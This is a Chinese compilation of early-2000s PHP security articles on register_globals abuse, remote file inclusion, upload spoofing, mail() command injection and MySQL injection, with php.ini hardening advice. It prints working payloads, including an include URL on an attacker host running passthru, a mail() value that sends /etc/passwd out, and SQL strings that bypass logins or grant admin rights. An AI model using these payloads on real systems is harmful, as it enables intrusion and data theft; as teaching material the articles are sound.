PHP攻防安全相关 -- 转

时间 2019-11-21

标签 php 攻防安全相关栏目 PHP 繁體版

原文原文链接

文章主要从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性，而且对如何加强PHP的安全性提出了一些有用的建议。

好了，废话少说，咱们言归正传！

[全局变量]
PHP中的变量不须要事先声明，它们会在第一次使用时自动建立，它们的类型也不须要指定，它们会根据上下文环境自动肯定。从程序员的角度来看，这无疑是一种极其方便的处理方法。很显然，这也是快速开发语言的一个颇有用的特色。一旦一个变量被建立了，就能够在程序中的任何地方使用。这个特色致使的结果就是程序员不多初始化变量，毕竟，当它们第一次建立时，他们是空的。

很显然，基于PHP的应用程序的主函数通常都是接受用户的输入（主要是表单变量，上载文件和Cookie等），而后对输入数据进行处理，而后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽量容易，实际上PHP是把这些输入数据看做全局变量来处理的。

例如： php

FORM METHOD=GET ACTION=test.php; 
INPUT TYPE=TEXT NAME=hello; 
INPUT TYPE=SUBMIT; 
FORM;

很显然，这会显示一个文本框和提交按钮。当用户点击提交按钮时，“test.php”会处理用户的输入，当“test.php”运行时，“$hello”会包含用户在文本框输入的数据。从这里咱们应该看出，攻击者能够按照本身的意愿建立任意的全局变量。若是攻击者不是经过表单输入来调用“test.php”，而是直接在浏览器地址栏输入httpservertest.phphello=hi&setup=no，那么，不止是“$hello”被建立，“$setup”也被建立了。

译者注：这两种方法也就是咱们一般说的“POST”和“GET”方法。
下面的用户认证代码暴露了PHP的全局变量所致使的安全问题： css

php 
  if ($pass == hello) 
    $auth = 1; 
  ...  
  if ($auth == 1) 
    echo some important information; 
;

上面的代码首先检查用户的密码是否为“hello”，若是匹配的话，设置“$auth”为“1”，即经过认证。以后若是“$suth”为“1”的话，就会显示一些重要信息。

表面看起来是正确的，并且咱们中有至关一部分人是这样作的，可是这段代码犯了想固然的错误，它假定“$auth”在没有设置值的时候是空的，却没有想到攻击者能够建立任何全局变量并赋值，经过相似“httpservertest.phpauth=1”的方法，咱们彻底能够欺骗这段代码，使它相信咱们是已经认证过的。

所以，为了提升PHP程序的安全性，咱们不能相信任何没有明肯定义的变量。若是程序中的变量不少的话，这但是一项很是艰巨的任务。

一种经常使用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量，这依赖于咱们的提交方式（GET或POST）。当PHP配置为打开“track_vars”选项的话（这是缺省值），用户提交的变量就能够在全局变量和上面提到的数组中得到。

可是值得说明的是，PHP有四个不一样的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量，HTTP_POST_VARS数组用于处理POST方式提交的变量，HTTP_COOKIE_VARS数组用于处理做为cookie头提交的变量，而对于HTTP_POST_FILES数组（比较新的PHP才提供），则彻底是用户用来提交变量的一种可选方式。用户的一个请求能够很容易的把变量存在这四个数组中，所以一个安全的PHP程序应该检查这四个数组。

[远程文件]
PHP是一种具备丰富特性的语言，提供了大量的函数，使编程者实现某个功能很容易。可是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就是说明这个问题的一个很好的例子： html

if (!($fd = fopen($filename, r)) 
    echo(Could not open file $filename);

上面的脚本试图打开文件“$filename”，若是失败就显示错误信息。很明显，若是咱们可以指定“$filename”的话，就能利用这个脚本浏览系统中的任何文件。可是，这个脚本还存在一个不太明显的特性，那就是它能够从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。

例如：
若是指定“$filename”为“httptargetscripts..Á ..winntsystem32cmd.exec+dir”
则上面的代码其实是利用主机target上的unicode漏洞，执行了dir命令。

这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，而且把它们按照PHP代码解释，主要是用在库文件上。

例如：
php
include($libdir . languages.php);

上例中“$libdir”通常是一个在执行代码前已经设置好的路径，若是攻击者可以使得“$libdir”没有被设置的话，那么他就能够改变这个路径。可是攻击者并不能作任何事情，由于他们只能在他们指定的路径中访问文件languages.php（perl中的“Poison null byte”攻击对PHP没有做用）。可是因为有了对远程文件的支持，攻击者就能够作任何事情。例如，攻击者能够在某台服务器上放一个文件languages.php，包含以下内容：
php
passthru(binls etc);

而后把“$libdir”设置为“httpevilhost;”，这样咱们就能够在目标主机上执行上面的攻击代码，“etc”目录的内容做为结果返回到客户的浏览器中。

须要注意的是，攻击服务器（也就是evilhost）应该不能执行PHP代码，不然攻击代码会在攻击服务器，而不是目标服务器执行。

[文件上载]
PHP自动支持基于RFC 1867的文件上载，咱们看下面的例子： mysql

FORM METHOD=POST ENCTYPE=multipartform-data; 
INPUT TYPE=FILE NAME=hello; 
INPUT TYPE=HIDDEN NAME=MAX_FILE_SIZE VALUE=10240; 
INPUT TYPE=SUBMIT; 
FORM;

上面的代码让用户从本地机器选择一个文件，当点击提交后，文件就会被上载到服务器。这显然是颇有用的功能，可是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求，甚至在它开始解析被调用的PHP代码以前，它会先接受远程用户的文件，检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值，若是经过这些测试的话，文件就会被存在本地的一个临时目录中。

所以，攻击者能够发送任意文件给运行PHP的主机，在PHP程序尚未决定是否接受文件上载时，文件已经被存在服务器上了。

这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。

让咱们考虑一下处理文件上载的PHP程序，正如咱们上面说的，文件被接收而且存在服务器上（位置是在配置文件中指定的，通常是tmp），扩展名通常是随机的，相似“phpxXuoXG”的形式。PHP程序须要上载文件的信息以便处理它，这能够经过两种方式，一种方式是在PHP 3中已经使用的，另外一种是在咱们对之前的方法提出安全公告后引入的。

可是，咱们能够确定的说，问题仍是存在的，大多数PHP程序仍是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件，好比说上面的例子：

$hello = Filename on local machine (e.g tmpphpxXuoXG)
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g ctemphello.txt)
$hello_type = Mime type of uploaded file (e.g textplain)

而后PHP程序开始处理根据“$hello”指定的文件，问题在于“$hello”不必定是一个PHP设置的变量，任何远程用户均可以指定它。若是咱们使用下面的方式：

httpvulnhostvuln.phphello=etcpasswd&hello_size=10240&hello_type=textplain&hello_name=hello.txt

就致使了下面的PHP全局变量（固然POST方式也能够（甚至是Cookie））：

$hello = etcpasswd
$hello_size = 10240
$hello_type = textplain
$hello_name = hello.txt

上面的表单数据正好知足了PHP程序所指望的变量，可是这时PHP程序再也不处理上载的文件，而是处理“etcpasswd”（一般会致使内容暴露）。这种攻击能够用于暴露任何敏感文件的内容。

我在前面已经说了，新版本的PHP使用HTTP_POST_FILES[]来决定上载文件，同时也提供了不少函数来解决这个问题，例若有一个函数用来判断某个文件是否是实际上载的文件。这些函数很好的解决了这个问题，可是实际上确定有不少PHP程序仍然使用旧的方法，很容易受到这种攻击。

做为文件上载的攻击方法的一个变种，咱们看一下下面的一段代码：

php
if (file_exists($theme)) Checks the file exists on the local system (no remote files)
include($theme);

若是攻击者能够控制“$theme”的话，很显然它能够利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令，可是他没法使用远程文件，所以，他必须得在远程服务器上建立一个PHP文件。这乍看起来好象是不可能的，可是文件上载帮了咱们这个忙，若是攻击者先在本地机器上建立一个包含PHP代码的文件，而后建立一个包含名为“theme”的文件域的表单，最后用这个表单经过文件上载把建立的包含PHP代码的文件提交给上面的代码，PHP就会把攻击者提交的文件保存起来，并把“$theme”的值设置为攻击者提交的文件，这样file_exists()函数会检查经过，攻击者的代码也将执行。

得到执行任意指令的能力以后，攻击者显然想提高权限或者是扩大战果，而这又须要一些服务器上没有的工具集，而文件上载又一次帮了咱们这个忙。攻击者可使用文件上载功能上载工具，把她们存在服务器上，而后利用他们执行指令的能力，使用chmod()改变文件的权限，而后执行。例如：攻击者能够绕过防火墙或IDS上载一个本地root攻击程序，而后执行，这样就得到了root权限。

如何对PHP程序中的常见漏洞进行攻击（下）
[库文件]
正如咱们前面讨论的那样，include()和require()主要是为了支持代码库，由于咱们通常是把一些常用的函数放到一个独立的文件中，这个独立的文件就是代码库，当须要使用其中的函数时，咱们只要把这个代码库包含到当前的文件中就能够了。

最初，人们开发和发布PHP程序的时候，为了区别代码库和主程序代码，通常是为代码库文件设置一个“.inc”的扩展名，可是他们很快发现这是一个错误，由于这样的文件没法被PHP解释器正确解析为PHP代码。若是咱们直接请求服务器上的这种文件时，咱们就会获得该文件的源代码，这是由于当把PHP做为Apache的模块使用时，PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的，通常是“.php”， “.php3”和“.php4”。若是重要的配置数据被包含在没有合适的扩展名的PHP文件中，那么远程攻击者很容易获得这些信息。

最简单的解决方法就是给每一个文件都指定一个PHP文件的扩展名，这样能够很好的防止泄露源代码的问题，可是又产生了新的问题，经过请求这个文件，攻击者可能使本该在上下文环境中运行的代码独立运行，这可能致使前面讨论的所有攻击。

下面是一个很明显的例子：

In main.php
php
$libDir = libdir;
$langDir = $libdirlanguages;
...
include($libdirloadlanguage.php;
In libdirloadlanguage.php
php
...
include($langDir$userLang);

当“libdirloadlanguage.php”被“main.php”调用时是至关安全的，可是由于“libdirloadlanguage”具备“.php”的扩展名，所以远程攻击者能够直接请求这个文件，而且能够任意指定“$langDir 和 “$userLang” 的值。
[Session文件]
PHP 4或更新的版本提供了对sessions的支持，它的主要做用是在PHP程序中保存页与页之间的状态信息。例如，当一个用户登录进入网站，他登录了这个事实以及谁登录进入这个网站都被保存在session中，当他在网站中处处浏览时，全部的PHP代码均可以得到这些状态信息。

事实上，当一个session启动时（其实是在配置文件中设置为在第一次请求时自动启动），就会生成一个随机的“session id”，若是远程浏览器老是在发送请求时提交这个“session id”的话，session就会一直保持。这经过Cookie很容易实现，也能够经过在每页提交一个表单变量（包含“session id”）来实现。PHP程序能够用session注册一个特殊的变量，它的值会在每一个PHP脚本结束后存在session文件中，也会在每一个PHP脚本开始前加载到变量中。下面是一个简单的例子：程序员

php 
  session_destroy();  Kill any data currently in the session 
  $session_auth = shaun; 
  session_register(session_auth);  
  Register $session_auth as a session variable;

新版本的PHP都会自动把“$session_auth”的值设置为“shaun”，若是它们被修改的话，之后的脚本都会自动接受修改后的值，这对无状态的Web来讲的确是种很不错的工具，可是咱们也应该当心。

一个很明显的问题就是确保变量的确来自session，例如，给定上面的代码，若是后续的脚本是下面这样的话：

php
if (!empty($session_auth))
Grant access to site here;

上面的代码假定若是“$session_auth”被置位的话，就是从session，而不是从用户输入来置位的，若是攻击者经过表单输入来置位的话，他就能够得到对站点的访问权。注意攻击者必须在session注册该变量以前使用这种攻击方法，一旦变量被放进了session，就会覆盖任何表单输入。

Session数据通常是保存在文件中（位置是可配置的，通常是“tmp”），文件名通常是相似“sess_session id;”的形式，这个文件包含变量名称，变量类型，变量值和一些其它的数据。在多主机系统中，由于文件是以运行Web服务器的用户身份（通常是nobody）保存的，所以恶意的站点拥有者就能够经过建立一个session文件来得到对其它站点的访问，甚至能够检查session文件中的敏感信息。

Session机制也为攻击者把本身的输入保存在远程系统的文件中提供了另外一个方便的地方，对于上面的例子来讲，攻击者须要在远程系统放置一个包含PHP代码的文件，若是不能利用文件上载作到的话，他一般会利用session为一个变量按照本身的意愿赋一个值，而后猜想session文件的位置，而他知道文件名是“phpsession id;”，因此只需猜想目录，而目录通常就是“tmp”。

另外，攻击者能够任意指定“session id”（例如“hello”），而后用这个“session id”建立一个session文件（例如“tmpsess_hello”），可是“session id”只能是字母和数字组合。

[数据类型]
PHP具备比较松散的数据类型，变量的类型依赖于它们所处的上下文环境。例如：“$hello”开始是字符串变量，值为“”，可是在求值时，就变成了整形变量“0”，这有时可能会致使一些意想不到的结果。若是“$hello”的值为“000”仍是为“0”是不一样的，empty()返回的结果也不会为真。

PHP中的数组是关联数组，也就是说，数组的索引是字符串型的。这意味着“$hello[000]” 和“$hello[0]”也是不一样的。

开发程序的时候应该仔细地考虑上面的问题，例如，咱们不该该在一个地方测试某个变量是否为“0”，而在另外的地方使用empty()来验证。

[容易出错的函数]
咱们在分析PHP程序中的漏洞时，若是可以拿到源代码的话，那么一份容易出错的函数列表则是咱们很是须要的。若是咱们可以远程改变这些函数的参数的话，那么咱们就极可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表：

PHP代码执行;
require()：读取指定文件的内容而且做为PHP代码解释
include()：同上
eval()：把给定的字符串做为PHP代码执行
preg_replace()：当与“e”开关一块儿使用时，替换字符串将被解释为PHP代码

命令执行;
exec()：执行指定的命令，返回执行结果的最后一行
passthru()：执行指定命令，返回全部结果到客户浏览器
``：执行指定命令，返回全部结果到一个数组
system()：同passthru()，可是不处理二进制数据
popen()：执行指定的命令，把输入或输出链接到PHP文件描述符

文件泄露;
fopen()：打开文件，并对应一个PHP文件描述符
readfile()：读取文件的内容，而后输出到客户浏览器
file()：把整个文件内容读到一个数组中

译者注：其实这份列表还不是很全，好比“mail()”等命令也可能执行命令，因此须要本身补充一下。
[如何加强PHP的安全性]
我在上面介绍的全部攻击对于缺省安装的PHP 4均可以很好的实现，可是我已经重复了不少次，PHP的配置很是灵活，经过配置一些PHP选项，咱们彻底可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类：

低难度
中低难度
中高难度
高难度

上面的分类只是我的的见解，可是我能够保证，若是你使用了PHP提供的全部选项的话，那么你的PHP将是很安全的，即便是第三方的代码也是如此，由于其中不少功能已经不能使用。

设置“register_globals”为“off”
这个选项会禁止PHP为用户输入建立全局变量，也就是说，若是用户提交表单变量“hello”，PHP不会建立“$ hello”，而只会建立“HTTP_GETPOST_VARS['hello']”。这是PHP中一个极其重要的选项，关闭这个选项，会给编程带来很大的不便。

设置“safe_mode”为“on”
打开这个选项，会增长以下限制：
1．限制哪一个命令能够被执行
2．限制哪一个函数能够被使用
3．基于脚本全部权和目标文件全部权的文件访问限制
4．禁止文件上载功能
这对于ISP来讲是一个伟大的选项，同时它也能极大地改进PHP的安全性。

设置“open_basedir”
这个选项能够禁止指定目录以外的文件操做，有效地消除了本地文件或者是远程文件被include()的攻击，可是仍须要注意文件上载和session文件的攻击。

设置“display_errors”为“off”，设置“log_errors”为“on”
这个选项禁止把错误信息显示在网页中，而是记录到日志文件中，这能够有效的抵制攻击者对目标脚本中函数的探测。

设置“allow_url_fopen”为“off”
这个选项能够禁止远程文件功能，极力推荐！

对PHP程序中的常见漏洞进行攻击之狗尾续貂

A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
之狗尾续貂

by san@netguard.com.cn

Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒，
考虑到了不少方面，我这个文章只是狗尾续貂，补充一些其它没怎么提到的问题。本文侧重于解决问题，而不是
攻击。

一、古老的欺骗SQL语句
在默认模式下，即便是你忘了把php.ini拷到usrlocallibphp.ini下，php仍是打开magic_quotes_gpc＝on。
这样全部从GETPOSTCookie来的变量的单引号(')、双引号()、反斜杠backslash()以及空字元NUL
(the null byte)都会被加上反斜杠，以使数据库可以正确查询。
可是在php-4-RC2的时候引入了一个配置文件php.ini-optimized，这个优化的php.ini倒是
magic_quotes_gpc＝off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
usrlocallibphp.ini，这时就比较危险。象比较简单的验证，假设没有过滤必要的字符：
select from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
咱们就能够在用户框和密码框输入1‘ or 1='1经过验证了。这是很是古董的方法了，这个语句会
替换成这样：
select from login where user='1' or 1='1' and pass='1' or 1='1'
由于or 1='1'成立，因此经过了。
解决的办法最好就是过滤全部没必要要的字符，还有就是推荐对于从GETPOSTCookie来的而且用在SQL
中的变量加一个自定义的函数：
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
主要是为了你的程序能安全移植在各类系统里。

二、mail函数的第五个参数
在php-4.0.5的时候，mail函数引入了第五个参数，用来设置在实际发送邮件的时候增长额外的命令行参数，
可是没有很好的检查特殊SHELL命令字符，因此出现执行命令的大问题。就像手册里的例子：
mail(nobody@aol.com, the subject, $message, From webmaster@$SERVER_NAME, -fwebmaster@$SERVERNAME);
这个是存在问题的，若是$SERVER_NAME=;mail san@xfocus.org etcpasswd就能把机器的密码发送
到个人信箱了。
这里提醒一下，php手册里还有好几个例子存在安全问题的，你们实际使用的时候不要照搬，它只是演示函数的
基本功能，理解了就能够了。
对于mail函数的这个问题，最简单的咱们就不用这个第五个参数，要使用就过滤非法的字符如(;)，还有就是修改
php源码包的程序extstandardmail.c，在if (extra_cmd != NULL) { 前增长以下一行：
extra_cmd=NULL
而后从新编译。

三、UNIX版的require, include函数
win版本的require和include函数是不支持HTTP和FTP远程文件包含的，而UNIX版本默认都是支持远程包含文件。
require和include无论你是什么扩展名的，把你包含进来就做为程序的一部分来执行。
咱们在写程序的时候为了程序的模块化，以及程序的可移植性，不可避免的用到不少require或include函数，
并且有时用变量做为参数，好比：include($something); 若是这时用户能控制$something参数，而这个
参数又没有过滤，那就惨拉。
首先能够看任何web用户有读权限的文件，假设这个程序叫httpvictimtest.php，这样咱们就能够用以下
url httpvictimtest.phpsomething=etcpasswd 看到etcpasswd文件。
另外能够利用其远程文件包含的功能执行命令。好比我在httpwww.xfocus.org下创建一个文件test.php，内容是：
passthru($cmd);，那么我就能够用以下的url
httpvictimtest.phpsomething=httpwww.xfocus.orgtest.phpcmd=uname这种方式运行任
意的命令。
phpMyAdmin也出现了这个问题，咱们能够用它看任何咱们想看的文件。可是它在include前，先用file_exist
函数判断文件是否存在，而这个file_exist是不支持远程文件的，因此上面第二种办法没法直接使用。可是咱们
能够利用apache的日志功能，请求一个带php代码的url，这样，something指定为apache的日志也能够执行命
令了，可是apache的日志一般比较大，有太多杂乱信息。
httpwww.securereality.com.ausradv00008.txt提到的办法比较巧妙，用file upload的方式把本地
的执行命令的脚本上传，会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名，因为这时文件是存在的
，因此能经过file_exist函数，从而执行上传文件里的执行脚本。

因此对于include, require函数的使用必定要当心，特别是以包含的文件以参数指定这种方式，参数绝对不能
让用户来控制。还有经过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3之前用
disable-url-fopen-wrapper 在之后的版本用allow_url_fopen ＝ off来关闭。

四、disable_function
在php-4.0.1，php.ini里引入了一项功能disable_functions , 这个功能比较有用，能够用它禁止一些函数。
好比在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候
只会提示Warning system() has been disabled for security reasons.
唉，可是也不是没有办法执行系统命令了。由于php采用了不少perl的特性，好比还能够用(`)来执行命令：

$output = `ls -al`;
echo pre;$outputpre;;
;
这个只有设成safe_mode才能避免，但是可恶的safe_mode实在是限制太多了，作其它事情也有些碍手碍脚。

五、file upload
php文件上传的问题在文章httpwww.securereality.com.ausradv00001.html里已经描述的很清楚了，
这的确是个比较严重的问题，通常咱们要上传的文件也会放在web目录，因此容易给攻击者获得系统的一些web用户
能读的文件。
幸好在php-4.0.3之后提供了is_uploaded_file和move_uploaded_file函数。因此php-4.0.3以上的上传文
件的程序必定不要再用copy函数了，用move_uploaded_file代替，它会检查是不是上传的文件。若是是php-4.0.2
及如下的，建议在copy前加一个函数：
function is_uploaded_file($filename) {
if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
$tmp_file = dirname(tempnam('', ''));
}
$tmp_file.=''.basename($filename);
User might have trailing slash in php.ini...
return (ereg_replace('+', '', $tmp_file) == $filename);
}

这个漏洞在安全焦点呆了好久，只是在copy以前有不少验证阿、判断阿的语句，因此使之攻击存在至关的难度，赫赫。

还有，千万不要以环境变量、Cookie变量、session变量等做为关系生死的判断条件，由于这些变量太容易被伪造了。
呵呵，手头事情比较多，其它慢慢想到了再加吧，也欢迎其余同志任意的添加修改之。

参考文献
一、PHP 4 ChangeLog (httpwww.php.netChangeLog-4.php)
二、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
(httpwww.securereality.com.austudyinscarlet.txt)及analysist的翻译。
三、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
(httpwww.securereality.com.ausradv00008.txt)

php注入专题

建立时间：2005-03-09
文章属性：原创
文章提交：54alpha (netsh_at_163.com)

php注入专题
------------Alpha

此文已发于《黑客x档案》2004年10期专题。
谨以此文献给最爱个人爸爸妈妈，以及全部帮助过个人人。

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@因为xfocus不支持上传图片
您能够到httpwww.54hack.infotxtphp.pdf下载此文的pdf文档(含图片)

Php注入攻击是现今最流行的攻击方式，依靠它强大的灵活性吸引了广大黑迷。

在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各类漏洞，也讲到了php＋mysql注入的问题，但是讲的注入的问题比较少，让咱们感受没有尽兴是吧.
OK,这一期我将给你们伙仔仔细细的吹一吹php＋mysql注入，必定让你满载而归哦（谁扔砖头哩！）。
本文主要是为小菜们服务的，若是你已是一只老鸟呢，可能某些东西会感受比较乏味，但只要你仔细的看，你会发现不少有趣的东西哦。

阅读此文你只要明白下面的这点东西就够了。

1.明白php+mysql环境是如何搭建的，在光盘中咱们收录搭建的相关文章，若是您对搭建php+mysql环境不是很清楚，请先查阅此文，在上一期的专题中也有所介绍。
2.大概了解php和apache的配置，主要用到php.ini和httpd.conf
而此文咱们主要用到的是php.ini的配置。为了安全起见咱们通常都打开php.ini里的安全模式，即让safe_mode = On，还有一个就是返回php执行错误的display_errors 这会返回不少有用的信息，因此咱们应该关闭之，
即让display_errors＝off 关闭错误显示后，php函数执行错误的信息将不会再显示给用户。
在php的配置文件php.ini中还有一个很是重要的配置选项magic_quotes_gpc，高版本的默认都是magic_quotes_gpc＝On，只有在原来的古董级的php中的
默认配置是magic_quotes_gpc＝Off，但是古董的东西也有人用的哦！
当php.ini中magic_quotes_gpc＝On的时候会有什么状况发生哩，不用惊慌，天是塌不下来的啦！它只是把提交的变量中全部的 ' (单引号), “ (双引号), (反斜线) 和空字符会自动转为含有反斜线的转义字符，例如把’变成了’,把变成了。
就是这一点，让咱们很不爽哦，不少时候咱们对字符型的就只好说BYEBYE了，
可是不用气馁，咱们仍是会有好方法来对付它的，往下看咯！
3.有必定的php语言基础和了解一些sql语句，这些都很简单，咱们用到的东西不多，因此充电还来的及哦！

咱们先来看看magic_quotes_gpc＝Off的时候咱们能干些啥，而后咱们再想办法搞一搞magic_quotes_gpc＝On的状况哈

一：magic_quotes_gpc＝Off时的注入攻击
magic_quotes_gpc＝Off的状况虽说很不安全，新版本默认也让
magic_quotes_gpc＝On了，但是在不少服务器中咱们还发现magic_quotes_gpc＝Off的状况，例如httpwww.qichi.。
还有某些程序像vbb论坛就算你配置magic_quotes_gpc＝On，它也会自动消除转义字符让咱们有隙可乘，因此说
magic_quotes_gpc＝Off的注入方式仍是大有市场的。

下面咱们将从语法，注入点 and 注入类型几个方面来详细讲解mysql＋php注入

A从MYSQL语法方面先
1。先讲一些mysql的基本语法，算是给没有好好学习的孩子补课了哦~_~
1）select
SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
select_expression,...
[INTO {OUTFILE DUMPFILE} 'file_name' export_options]
[FROM table_references
[WHERE where_definition]
[GROUP BY col_name,...]
[ORDER BY {unsigned_integer col_name formula} [ASC DESC] ,...]
]
经常使用的就是这些，select_expression指想要检索的列，后面咱们能够用where来限制条件，咱们也能够用into outfile将select结果输出到文件中。固然咱们也能够用select直接输出
例如

mysql; select 'a';
+---+
a
+---+
a
+---+
1 row in set (0.00 sec)
具体内容请看mysql中文手册7.12节
下面说一些利用啦
看代码先
这段代码是用来搜索的哦

form method=“POST” action=“ echo $PHP_SELF; ;“;
input type=“text” name=“search”;br;
input type=“submit” value=“Search”;
form;
php
………
SELECT FROM users WHERE username LIKE ‘%$search%’ ORDER BY username
…….
;

这里咱们顺便说一下mysql中的通配符，’%’就是通配符，其它的通配符还有’’和’_’,其中用来匹配字段名，而 % 用来匹配字段值，注意的是%必须与like一块儿适用，还有一个通配符，就是下划线 _ ，它表明的意思和上面不一样，是用来匹配任何单个的字符的。在上面的代码中咱们用到了’’表示返回的全部字段名，%$search%表示全部包含$search字符的内容。

咱们如何注入哩？
哈哈，和asp里很类似
在表单里提交
Aabb%’ or 1=1 order by id#
注：#在mysql中表示注释的意思，即让后面的sql语句不执行，后面将讲到。
或许有人会问为何要用or 1＝1呢，看下面，

把提交的内容带入到sql语句中成为

SELECT FROM users WHERE username LIKE ‘%aabb%’ or 1=1 order by id# ORDER BY username

假如没有含有aabb的用户名，那么or 1＝1使返回值仍为真，使能返回全部值

咱们还能够这样

在表单里提交
%’ order by id#
或者
’ order by id#
带入sql语句中成了
SELECT FROM users WHERE username LIKE ‘% %’ order by id# ORDER BY username
和
SELECT FROM users WHERE username LIKE ‘%%’ order by id# ORDER BY username
固然了，内容所有返回。
列出全部用户了哟，没准连密码都出来哩。
这里就举个例子先，下面会有更精妙的select语句出现，select实际上几乎是无处不在的哦！
2)下面看update咯
Mysql中文手册里这么解释的：
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,...
[WHERE where_definition]
UPDATE用新值更新现存表中行的列，SET子句指出哪一个列要修改和他们应该被给定的值，WHERE子句，若是给出，指定哪一个行应该被更新，不然全部行被更新。
详细内容去看mysql中文手册7.17节啦，在这里详细介绍的话会很罗嗦的哦。
由上可知update主要用于数据的更新，例如文章的修改，用户资料的修改，咱们彷佛更关心后者，由于......
看代码先哦
咱们先给出表的结构，这样你们看的明白
CREATE TABLE users (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
其中userlevel表示等级，1为管理员，2为普通用户
php
change.php
……
$sql = UPDATE users SET password='$pass', email='$email' WHERE id='$id'
……
;
Ok，咱们开始注入了哦，在添email的地方咱们添入
netsh@163.com’,userlevel=’1
sql语句执行的就是
UPDATE users SET password='youpass',
email='netsh@163.com’,userlevel=’1’ WHERE id='youid’
看看咱们的userlevel就是1了，变成管理员了哟
哈哈，如此之爽，简直是居家旅行必备啊。
这里咱们简单提一下单引号闭合的问题，若是只用了一个单引号而没有单引号与之组成一对，系统会返回错误。列类型主要分为数字类型，日期和时间类型，字符串类型，然而引号通常用在字符串类型里，而在数字类型里通常人都不会用到引号（然而倒是能够用的，并且威力很大），日期和时间类型就不多用于注入了（由于不多有提交时间变量的）。在下面咱们会详细将这几种类型的注入方式哦！

3)下面轮到insert了，它已经等的不耐烦了，简直就像中午食堂里的学生们。
Php中文手册是这样教咱们的：
INSERT [LOW_PRIORITY DELAYED] [IGNORE]
[INTO] tbl_name [(col_name,...)]
VALUES (expression,...),(...),...
INSERT把新行插入到一个存在的表中，INSERT ... VALUES形式的语句基于明确指定的值插入行，INSERT ... SELECT形式插入从其余表选择的行，有多个值表的INSERT ... VALUES的形式在MySQL 3.22.5或之后版本中支持，col_name=expression语法在MySQL 3.22.10或之后版本中支持。
因而可知对于见不到后台的咱们来讲，insert主要就出如今注册的地方，或者有其它提交的地方地方也能够哦。

看看表的结构先
CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
咱们仍然假设userlevel表示用户等级，1为管理者，2为普通用户哈。
代码以下
php
reg.php
……
$query = INSERT INTO members VALUES('$id','$login','$pass','$email',’2') ;
……
;
默认插入用户等级是2
如今咱们构建注入语句了哦
仍是在要咱们输入email的地方输入：
netsh@163.com’,’1’)#
sql语句执行时变成了：
INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com’,’1’)#',')
看咱们一注册就是管理员了。
#号表示什么来着，不是忘了吧，晕了，这么快？
忘就忘了吧，下面再详细给你说说

2.下面说一说mysql中的注释，这个是很重要的，你们可不能再睡觉啦，要是再睡觉到期末考试的时候就挂了大家。
咱们继续
相信你们在上面的几个例子中已经看到注释的强大做用了吧，这里咱们将再详细介绍一下。
Mysql有3种注释句法
# 注射掉注释符后面的本行内容
-- 注射效果同#
... 注释掉符号中间的部分

对于#号将是咱们最经常使用的注释方法。
-- 号记得后面还得有一个空格才能起注释做用。
… 咱们通常只用前面的就够了，由于后面的咱们想加也不行，是吧？

注意：在浏览器地址栏输入#时应把它写成%23，这样经urlencode转换后才能成为#，从而起到注释的做用。#号在浏览器的地址框中输入的话可什么也不是哦。
为了你们深入理解
这里我给你们来个例题

有以下的管理员信息表

CREATE TABLE alphaauthor (
Id tinyint(4) NOT NULL auto_increment,
UserName varchar(50) NOT NULL default '',
PASSWORD varchar(50) default NULL,
Name varchar(50) default NULL,
PRIMARY KEY (Id),
UNIQUE KEY Id (Id),
KEY Id_2 (Id)
)

php
Login.php
……
$query=select from alphaauthor where UserName='$username' and Password='$passwd';
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
Echo “重要信息”;
}
Else
Echo “登录失败”;
……
;

咱们在浏览器地址框直接输入
httplogin.phpusername=a’or id=1 %23
%23转换成#了
放到sql语句中
select from alphaauthor where UserName='a’or id=1 #' and Password='$passwd'
#号后面的都拜输入了，看看
这句话等价于
select from alphaauthor where UserName='a’or id=1

再仔细看看表的结构，只要有id=1的帐户，返回的$data就应该为真
咱们就直接登录了，固然你也能够写
hpptlogin.phpusername=a’or 1＝1 %23
同样的啦

3.下面将要出场的是……
对了，就是这些显示系统信息的间谍们

VERSION() 返回数据库版本信息
DATABASE() 返回当前的数据库名字，若是没有当前的数据库，DATABASE()返回空字符串。
USER()
SYSTEM_USER()
SESSION_USER()
返回当前MySQL用户名
mysql; select user(),database(),version();
+----------------+------------+----------------+
user() database() version()
